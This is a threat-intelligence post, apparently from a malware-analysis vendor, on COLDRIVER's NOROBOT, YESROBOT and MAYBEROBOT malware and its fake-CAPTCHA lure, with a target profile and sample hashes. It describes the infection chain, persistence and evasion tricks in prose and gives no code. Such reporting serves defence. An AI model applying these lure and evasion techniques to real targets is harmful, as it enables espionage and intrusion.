Regions Targeted: Not Specified
Related Families: LOSTKEYS, COLDCOPY, YESROBOT, MAYBEROBOT
Key Takeaways
The Activity
The infection chain begins with a refined version of the COLDCOPY “ClickFix” lure, a deceptive tactic posing as a CAPTCHA verification to trick users into executing a malicious DLL named “iamnotarobot.dll” via rundll32. Unlike LOSTKEYS, which relied on multi-stage PowerShell scripts, this updated delivery method enhances efficiency. The lure incorporates text like “humanCheck” to reinforce the CAPTCHA disguise, aligning with the ROBOT-themed naming of the malware families.
NOROBOT, first observed in May 2025, serves as the initial downloader, retrieving subsequent stages from a hardcoded command-and-control (C2) server. Early versions fetched a self-extracting RAR containing a Python 3.8 installation for Windows, stored cryptographic keys in the registry, and established persistence via scheduled tasks. Files like `libsystemhealthcheck.py` and `libcryptopydatasize.py` were downloaded using bitsadmin, with the former containing part of an AES key to decrypt the latter, identified as YESROBOT.
YESROBOT, a Python-based backdoor, communicates via HTTPS to a C2 server, encoding system information in the User-Agent header. Its reliance on valid Python commands for functionality limited its extensibility, leading to its brief deployment in late May 2025. COLDRIVER quickly pivoted to MAYBEROBOT, a PowerShell-based backdoor observed in June 2025. MAYBEROBOT, fetched via a simplified NOROBOT variant, supports three commands: downloading and executing files from a URL, running cmd.exe commands, and executing PowerShell blocks. Its extensible protocol and lack of dependency on a Python installation make it more effective for sustained operations.
COLDRIVER’s ongoing refinements to NOROBOT, observed through September 2025, include rotating infrastructure, altering file names, and reintroducing complex cryptographic key splitting to hinder analysis. While MAYBEROBOT has remained stable, its minimal built-in functionality requires operators to supply complex commands, balancing flexibility with operational complexity. This evolution underscores COLDRIVER’s focus on evading detection while targeting high-value individuals for intelligence collection.
Who is COLDRIVER?
COLDRIVER, also known as UNC4057, Star Blizzard, and Callisto, is a Russian state-sponsored advanced persistent threat (APT) group specializing in cyber espionage. Active since at least 2017, the group conducts highly targeted operations aligned with Russian government interests, particularly those of the Federal Security Service (FSB). Their campaigns focus on intelligence collection through credential theft and network infiltration, often evading detection with evolving tools.
COLDRIVER employs sophisticated social engineering tactics, creating fake impersonation accounts on social media and professional platforms to build rapport with victims before delivering phishing lures. These lures include benign PDFs disguised as op-eds or articles requesting feedback, which contain links to credential-harvesting pages or malicious downloads. The group has recently expanded to deploy lightweight malware, such as the LOSTKEYS platform, which uses ClickFix CAPTCHA-style lures to trick users into executing malicious files. Once infected, backdoors like MAYBEROBOT enable persistent remote access, command execution, payload downloads, and data exfiltration. They leverage webmail services for initial outreach and cloud storage for hosting phishing content, enhancing evasion of traditional defenses.
The group primarily targets high-profile individuals and organizations in Western-aligned entities, including NATO governments, non-governmental organizations (NGOs), former intelligence and military officials, think tanks, journalists, and academic institutions. Geographically, operations span Europe, North America, and select Asia-Pacific regions. Sectors of interest include government agencies, defense, media, and education, with an emphasis on entities critical to geopolitical tensions, such as those supporting Ukraine or countering Russian influence. COLDRIVER's direct ties to the FSB underscore its role as a Kremlin-backed espionage arm, prioritizing surveillance over disruption to advance Russian national security objectives. This alignment has been evidenced through consistent targeting patterns and technical overlaps with other Russian APTs.
IOCs
PolySwarm has multiple samples associated with this activity.
bce2a7165ceead4e3601e311c72743e0059ec2cd734ce7acf5cc9f7d8795ba0f
2e74f6bd9bf73131d3213399ed2f669ec5f75392de69edf8ce8196cd70eb6aee
3b49904b68aedb6031318438ad2ff7be4bf9fd865339330495b177d5c4be69d1
e9c8f6a7dba6e84a7226af89e988ae5e4364e2ff2973c72e14277c0f1462109b
b60100729de2f468caf686638ad513fe28ce61590d2b0d8db85af9edc5da98f9
f2da013157c09aec9ceba1d4ac1472ed049833bc878a23bc82fe7eacbad399f4
87138f63974a8ccbbf5840c31165f1a4bf92a954bacccfbf1e7e5525d750aa48
You can use the following CLI command to search for all COLDRIVER samples in our portal:
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.